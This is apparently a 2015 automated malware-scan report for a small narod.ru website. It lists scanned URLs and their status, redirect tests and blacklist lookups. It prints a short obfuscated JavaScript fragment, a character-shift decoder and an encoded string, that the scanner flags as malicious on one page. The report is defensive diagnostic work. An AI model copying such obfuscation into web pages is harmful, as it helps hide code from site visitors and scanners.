Scanned pages/files
| Request | Server response | Status |
http://tursiops-truncatus.narod.ru/ | 200 OK Content-Length: 16627 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=xUZVlcVKv5TQEgPZFiLWuuF;5T5C6cmcaRGEZaMsbAav2lVgNwBKY8sdRk1Kmxf4aRBr9zAQWLVOdGfPtLIEOEhCxbMwz4eqCJ9JLx4r4vcm0d5ah!xcOx5zX81w2acilLG2fXHXX5Z0WpTUy5LxBA0uJD^NxzDTU;5O!ehYO3srNgoo | 200 OK Content-Length: 2797 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/simpl.html | 200 OK Content-Length: 12783 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=M36dndnFsxknKw9Pi!^7Q41tZW4cv!5fMp6zLs1bybqgeFzAC0mJBsY4itJHAMVl!2DuwnHT^XOAfHSxzt;ke11IbC1KjkDxh21KNhhn8Ni!GITq7QcVMuBHJjSaf^Gdaj7QjwUiSbyMWKxMstT5WR4G5R!XVrf1wjbcCbqRQicy | 200 OK Content-Length: 2817 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/simple.html | 200 OK Content-Length: 19110 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=kTjnrdaqzN6SDexKTEIA^gj84xLFfrlBQy2stStHniYb5ed3CR0WM1pc6HFn9qQ^ZCkyuTPNRsB9JxyOJewCvidzCUMxWM6MeQ16ylyMAq2QLsVRAKu4PYZIfMpnnkQ2!Bk6IbPqH7r!ZizIwjqWYL5v0S2sz!2g5YV3E0AOa3co | 200 OK Content-Length: 2785 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/gb | 200 OK Content-Length: 54320 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('?lqsxw#w|sh@%klgghq%#qdph@%vrv%#ydoxh@%73647833<5%#2A3'); Antivirus reports:
| ||
http://tursiops-truncatus.narod.ru/abnl/?adsdata=P25cx7D1^ZtITttVunYGBxlA^UyM!cXXgpilwJtGNUnEqDeGdEudu;pK2fJ943!Fh5dvGyYOBe3cP7947UTwamFBxzFxzRZEjHzTazFkdnQiQcBbLzp5SjUJjrQLbBLh3b2NesuYQay1Rch6Zsc2fdFTI6VP6tQjdrgCb;^Shgoo | 200 OK Content-Length: 2817 Content-Type: application/javascript | clean |
http://s203.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s203.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s203.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://tursiops-truncatus.narod.ru/register | 200 OK Content-Length: 24474 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=irZk!d46y2NMPBpM2iMVP2MjqpaaKdGF;XSRGYW;YJG7eUsNf6JTctUgZEYskA8ZlfL28HbsQ^YAZFHUa7xUKczhtLMII0rJ;cXG4Juf6HrTMEmlnsTjeMnZLplJl!LNjaAnqCHQn9^yTFLuISWkLkM!O4Q^ZmNd5uHSw1OR73lR | 200 OK Content-Length: 2805 Content-Type: application/javascript | clean |
http://tursiops-truncatus.narod.ru/index/0-2 | 200 OK Content-Length: 17028 Content-Type: text/html | clean |
http://tursiops-truncatus.narod.ru/abnl/?adsdata=38lAGku6vQT5jaTSrcgXtOYuYVwZGl1MXxKXtnvepRG6H^LVdjvpB4!yj^ABCigyh8VpMMAvDQZAmTB;dR8qE9HQ;81rU5aL7YtLHmbW0rmJpKPV1t^LAZpGDnfcdTtuRqjHVF8b6stH^TEgstkzdMhXINg15bQbQKyCnTAc | 200 OK Content-Length: 2817 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tursiops-truncatus.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 20:07:37 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
GET / HTTP/1.1
Host: tursiops-truncatus.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 20:07:37 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: tursiops-truncatus.narod.ru
Referer: http://www.google.com/search?q=tursiops-truncatus.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tursiops-truncatus.narod.ru
Referer: http://www.google.com/search?q=tursiops-truncatus.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tursiops-truncatus.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tursiops-truncatus.narod.ru/
Result: tursiops-truncatus.narod.ru is not infected or malware details are not published yet.
Result: tursiops-truncatus.narod.ru is not infected or malware details are not published yet.